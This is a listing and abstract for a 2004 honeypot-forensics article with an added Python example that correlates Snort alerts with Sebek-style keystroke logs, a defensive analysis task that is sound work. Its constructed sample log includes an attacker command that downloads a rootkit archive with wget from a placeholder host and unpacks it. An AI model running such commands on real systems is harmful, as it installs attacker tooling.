Honeypot Forensics Part I: Analyzing the Network
July-August 2004 (vol. 2 no. 4)
pp. 72-78
Frederic Raynal, MISC Magazine
Yann Berthier, Hervé Schauer Consultant
Philippe Biondi, Arche/Omnetica Group
Danielle Kaminsky, TEGAM International
A major goal of honeypot research is to improve our knowledge of blackhats from two perspectives: technical and ethnological. For the former, we want new ways to discover rootkits, trojans, and potential zero-day exploits (although capturing zero-day exploits in a honeypot is an unusual event). For the latter, we want a better understanding of the areas of interest and hidden links between blackhat teams. One way to achieve these goals is to increase the verbosity of our honeypot logs and traces; the most common tools for doing this are Sebek (http://project.honeynet.org/tools/sebek/) for system events and Snort (www.snort.org) for network activity. Unfortunately, there is no easy way to correlate information from these sources, which complicates honeypot forensics.
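The correlation problem the abstract names (system events from Sebek and network alerts from Snort sit in separate logs with no shared key) is the kind of thing an analyst ends up scripting by hand. The following is an added example, not code from the paper or from the Honeynet Project: it joins Snort "fast" alert lines to Sebek-style keystroke records on the honeypot address and a time window after each alert. The Snort line layout is the real fast-alert format (which carries no year, so one is supplied); the Sebek record layout used here is a simplified, constructed one, not the real `sbk_ks_log` output, and all sample lines are constructed.

```python
"""Join Snort fast-format alerts to Sebek-style keystroke records.

Added example. The Sebek record layout below is a constructed, simplified
form (timestamp, host, uid, pid, command, keystrokes); the real Sebek
extraction tools print a different layout.
"""
import re
from datetime import datetime, timedelta

# Constructed Snort "fast" alerts. The fast format has no year field.
SNORT_ALERTS = """\
07/15-14:32:01.123456  [**] [1:2003:8] MS-SQL Worm propagation attempt [**] [Classification: Misc Attack] [Priority: 2] {UDP} 192.168.1.50:1434 -> 10.0.0.5:1434
07/15-14:40:10.000000  [**] [1:1000001:1] SSH brute force [**] [Classification: Attempted Admin] [Priority: 1] {TCP} 192.168.1.77:51000 -> 10.0.0.5:22
07/15-16:00:00.000000  [**] [1:1000002:1] Unrelated probe [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.1.9 -> 10.0.0.9
"""

# Constructed Sebek-like keystroke records (simplified layout, see docstring).
SEBEK_RECORDS = """\
2004-07-15 14:40:25 host=10.0.0.5 uid=0 pid=4411 com=bash ks=wget http://example.invalid/rk.tgz
2004-07-15 14:40:40 host=10.0.0.5 uid=0 pid=4411 com=bash ks=tar xzf rk.tgz
2004-07-15 15:30:00 host=10.0.0.5 uid=1001 pid=5002 com=bash ks=ls -la
"""

# Snort fast alert: "MM/DD-HH:MM:SS.usec  [**] [gid:sid:rev] msg [**] ... {PROTO} src[:port] -> dst[:port]"
ALERT_RE = re.compile(
    r"^(?P<month>\d\d)/(?P<day>\d\d)-(?P<time>\d\d:\d\d:\d\d)\.(?P<usec>\d+)\s+"
    r"\[\*\*\]\s+\[(?P<sid>[^\]]+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>\d+\.\d+\.\d+\.\d+)(?::\d+)?\s+->\s+"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?::\d+)?\s*$"
)

# Constructed Sebek-style record layout (not the real tool output).
SEBEK_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) host=(?P<host>\S+) uid=(?P<uid>\d+) "
    r"pid=(?P<pid>\d+) com=(?P<com>\S+) ks=(?P<ks>.*)$"
)


def parse_snort(text, year):
    """Parse fast-format alert lines; the caller supplies the missing year."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if not m:
            continue  # skip anything that is not a well-formed fast alert
        stamp = f"{year}/{m['month']}/{m['day']} {m['time']}.{m['usec']}"
        alerts.append({
            "ts": datetime.strptime(stamp, "%Y/%m/%d %H:%M:%S.%f"),
            "sid": m["sid"], "msg": m["msg"], "proto": m["proto"],
            "src": m["src"], "dst": m["dst"],
        })
    return alerts


def parse_sebek(text):
    """Parse the simplified Sebek-style records defined above."""
    records = []
    for line in text.splitlines():
        m = SEBEK_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
        records.append(rec)
    return records


def correlate(snort_text, sebek_text, year=2004, window=timedelta(minutes=5)):
    """For each alert, collect keystroke records on the targeted honeypot
    that fall within `window` after the alert time.  Returns one entry per
    alert so that alerts with no host-side activity remain visible."""
    alerts = parse_snort(snort_text, year)
    records = parse_sebek(sebek_text)
    result = []
    for a in alerts:
        hits = [r for r in records
                if r["host"] == a["dst"] and a["ts"] <= r["ts"] <= a["ts"] + window]
        result.append({"alert": a, "matches": hits})
    return result


if __name__ == "__main__":
    for entry in correlate(SNORT_ALERTS, SEBEK_RECORDS):
        a = entry["alert"]
        print(f"{a['ts']} [{a['sid']}] {a['msg']} {a['src']} -> {a['dst']}")
        for r in entry["matches"]:
            print(f"    {r['ts']} uid={r['uid']} pid={r['pid']} {r['com']}: {r['ks']}")
```

Two design points matter in practice: the join key is the honeypot address plus a time window rather than the attacker address, because Sebek records do not carry the remote peer, and every alert is kept in the output even when nothing matched, since an alert with no host-side activity is itself useful evidence that the attempt failed. Clock skew between the sensor and the honeypot should be measured and folded into the window before trusting the result.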
Index Terms:
honeynets, honeypots, blackhat
Citation:
Frederic Raynal, Yann Berthier, Philippe Biondi, Danielle Kaminsky, "Honeypot Forensics Part I: Analyzing the Network," IEEE Security & Privacy, vol. 2, no. 4, pp. 72-78, July-Aug. 2004, doi:10.1109/MSP.2004.47